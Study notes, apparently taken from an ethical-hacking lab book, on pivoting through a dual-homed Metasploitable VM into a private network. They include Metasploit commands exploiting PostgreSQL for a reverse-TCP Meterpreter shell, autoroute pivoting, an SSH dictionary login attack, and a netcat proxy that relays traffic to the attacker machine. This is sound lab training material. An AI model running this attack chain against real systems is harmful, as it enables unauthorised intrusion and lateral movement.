Pivoting(枢轴点;枢轴控件;轴门;锚点;转点) from a Dual-Homed Device
术语:Because the firewall is connected to both the public and private networks, we refer to the machine running the firewall as a dual-homed device.
Configuring a Dual-Homed Device
We will convert the Metasploitable virtual machine into a dual-homed device and attach it to another private network containing an Ubuntu virtual machine.
assign an IP address to the interface
msadmin@metasploitable:~# sudo vim /etc/network/interface
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
➊ iface eth0 inet dhcp
# The secondary network interface
auto eth1
➋ iface eth1 inet static
➌ address 10.0.0.1
➍ netmask 255.255.255.0Save the file and then start the eth1 interface by running the following command:
msadmin@metasploitable:~# sudo ip link set dev eth1 uprestart the networking interface:
msadmin@metasploitable:~# sudo /etc/init.d/networking restartConnecting a Machine to Your Private Network
We’ll use OpenSSH to log in to the Ubuntu machine. OpenSSH is
an open source implementation of an SSH server that allows users
to connect to a machine using SSH. Log in to your Ubuntu virtual
machine and install the OpenSSH server:
victim@ubuntu:~$ sudo apt-get install openssh-server
victim@ubuntu:~$ sudo systemctl enable sshmove your Ubuntu virtual machine to the private network by updating the interface in
VirtualBox to connect to Private LAN.
Pivoting with Metasploit
Nexpose vulnerability scanner allows you to perform scans from the Metasploit console.
select the Postgres exploit by entering the use keyword followed by the path to the exploit. We didn’t select a payload, so Metasploit will default to the reverse_tcp Meterpreter payload.
msf6 > use exploit/linux/postgres/postgres_payload
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcpmsf6 exploit(linux/postgres/postgres_payload) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.1.115:4444
[*] 192.168.1.112:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by
GCC .....
[*] Uploaded as /tmp/VfnRAqLD.so, should be cleaned up automatically
[*] Sending stage (976712 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.115:4444 -> 192.168.1.101:52575) at
.....
meterpreter >meterpreter > run autoroute -s 10.0.0.1/24
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/postgres/postgres_payload) > back接下来,暴力破解Ubuntu ssh
Create a file on your Kali Linux desktop containing the username and password of the Ubuntu machine called Ubuntu_passwords.txt. Each username–password pair should be on its own line with the username and password separated by a space.
Use this file in a dictionary-based attack on the SSH server. We’ll begin by selecting Metasploit’s ssh_login module.
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login)>set RHOST 10.0.0.15
RHOST => 10.0.0.15
msf6 auxiliary(scanner/ssh/ssh_login)>set USERPASS_FILE
/home/kali/Desktop/Ubuntu_passwords.txt
USERPASS_FILE => /home/kali/Desktop/Ubuntu_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login)>runWhen the attack completes, you should have a shell running on
the Ubuntu virtual machine. Run the following command to view a list
of all your sessions:
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Type Connection
-- ---- ----------
1 meterpreter x86/linux 192.168.1.115:4444 -> 192.168.1.112:41206
(192.168.1.112)
2 shell linux 192.168.1.115-192.168.1.112:59953 -> 10.0.0.15:22
(10.0.0.15)Writing an Attacker Proxy
kali@kali:~$ nc -lvp 5050copy the proxy.py file onto the Metasploitable server and run it:
msfadmin@metasploitable:~$ python3 proxy.py 10.0.0.1 4040 <Kali IP
address> 5050victim@ubuntu:~$ nc 10.0.0.1 4040Enter the phrase BOT Reporting For Duty in the Ubuntu terminal
running netcat. If the proxy is working correctly, it will route the
private LAN’s traffic to the terminal on your Kali Linux machine